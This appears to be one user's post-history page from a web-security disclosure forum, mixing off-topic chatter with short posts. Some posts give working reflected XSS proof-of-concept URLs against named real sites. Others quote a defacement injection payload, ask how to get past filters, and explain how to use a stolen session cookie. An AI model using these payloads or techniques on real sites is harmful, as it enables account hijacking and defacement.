Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Results 1 - 30 of 158
7 years ago
Ghozt
Sirdarckcat: I'm guilty. I don't have a small wee, honest! - Ghozt
Forum: XSS Info
7 years ago
Ghozt
@nul: I've tested it before, no, it won't work. - Ghozt
Forum: News and Links
7 years ago
Ghozt
nktpro Wrote:
-------------------------------------------------------
> Guys,
>
> This is the latest update from Y! Security for me. Up to now they haven't confirmed it's totally fixed yet:
>
> Just an update. We have what we think is a fix deployed to about one-third of our servers. We are receiving sporadic reports that images are not
Forum: XSS Info
7 years ago
Ghozt
Just so I don't have to start a new thread, does anyone know of an algorithm that's 40 characters long? I ran it through hashmaster and it didn't come up with anything. TestPassword - 52BF31F50EABC35D14D1D91D3DC7D0B8BB955971 - Ghozt
Forum: Projects
7 years ago
Ghozt
id, I'm still seeing "3 new". - Ghozt
Forum: Bugs
7 years ago
Ghozt
https://domains.aol.com/personaldomain/app/openRegistration?domainName=%3Cscript%3Ealert(1)%3C/script%3E - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
http://www.google.com/reviews/w/confirm?url=http%3A%2F%2F000.com%2Findex.php%3F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&q=000&c=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D000%26btnG%3DSearch&submit=Okay%2C+please+try+this+one I just wanted to share it since most Google vulnerabilities are in the subdomains. - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
chillervalley Wrote:
-------------------------------------------------------
> he looks more like an linux person

Uh oh, hurry up and edit that with "BSD". :P - Ghozt
Forum: OMG Ponies
7 years ago
Ghozt
QuoteYou Bore Me...... How's the move to seattle anyway? ... - Ghozt
Forum: News and Links
7 years ago
Ghozt
</noscript><script>alert("No, that's not a good idea.")</script> - Ghozt
Forum: XSS Info
7 years ago
Ghozt
@AnDrEw: http://digg.com/security/Mozilla_Says_Ten_Fucking_Days - Ghozt
Forum: News and Links
7 years ago
Ghozt
Is it just me or does it look like she had a FuManchu removed by laser surgery? - Ghozt
Forum: News and Links
7 years ago
Ghozt
If you want it fixed overnight then contact henrit ` yahoo-inc.com Replace ` with the AT sign. - Ghozt
Forum: XSS Info
7 years ago
Ghozt
Widgets don't work like extensions, do they? Can they integrate into the browser and interact with it? If they could and someone made an xpi to widget converter, I'd be in heaven. The only reason I stick with Firefox is for the extensions. - Ghozt
Forum: OMG Ponies
7 years ago
Ghozt
Oh, you must mean putting your e-mail in a post. I thought you meant that RSnake or id sold our email addresses. My bad. - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
Actually, I've never gotten any spam at the e-mail that I signed up here with. - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
I've seen two GET vulnerabilities, I was just too lazy to post them. If you want to see them, I'm sure I can easily find them again. - Ghozt
Forum: Full Disclosure
7 years ago
Ghozt
http://adbux.org/?r=%22%3Cscript%3Ealert(1)%3C/script%3E - 11 alerts.
Forum: Full Disclosure
7 years ago
Ghozt
Freewebs is your problem.
Forum: Projects
7 years ago
Ghozt
You need to create and chmod the log file.
Forum: Projects
7 years ago
Ghozt
http://mail.google.com/support/bin/static.py?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%3Cnull%3D%22 Not sure who to give credit to, because I doubt the person that sent it to me found it.
Forum: Full Disclosure
7 years ago
Ghozt
It did work yesterday, fixed.
Forum: Full Disclosure
7 years ago
Ghozt
It wasn't technically XSS, just HTML injection. This is what was injected: <body onload="document.body.innerHTML='<p align=center><font size=7>Own3d by Cyber-Terrorist</font><img src=http://c2000.com/gifs/billgates.jpg><p align=center><font size=7>--Cyb3rT--</font></p>';"><noscript>" Zone-H defacement link.
Forum: News and Links
7 years ago
Ghozt
No, HTML.
Forum: News and Links
7 years ago
Ghozt
http://digg.com/microsoft/Defaced_a_Microsoft_s_web_page They injected it as a country.
Forum: News and Links
7 years ago
Ghozt
Thanks .mario, it worked.
Forum: XSS Info
7 years ago
Ghozt
CrYpTiC_MauleR Wrote:
-------------------------------------------------------
> does it strip newlines or spaces too? If not then add some spaces or newlines before and after the = , hopefully they have some weak regex matching to strip the SRC value out.

Nope, it still gets stripped.
Forum: XSS Info
7 years ago
Ghozt
That would work except it's stripping everything after SRC=. Are there any ways to encode the "=" that would make it render?
Forum: XSS Info
7 years ago
Ghozt
I've got a possible vulnerability, it doesn't filter anything, but it does convert everything to capital letters. Is there any way around this?
Forum: XSS Info
7 years ago
Ghozt
When you have the cookie, you can use Add N Edit Cookies (Firefox), or edit the cookie file in the cookie folder (C:\Documents and Settings\<User>\Cookies) (Internet Explorer)
Forum: SQL and Code Injection